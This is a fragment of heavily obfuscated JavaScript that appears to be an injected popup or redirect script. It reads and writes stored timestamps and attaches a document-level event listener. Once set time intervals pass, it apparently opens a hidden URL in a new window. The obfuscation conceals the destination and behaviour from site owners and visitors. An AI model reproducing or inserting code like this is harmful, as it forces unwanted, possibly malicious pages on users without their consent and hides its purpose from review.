_0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());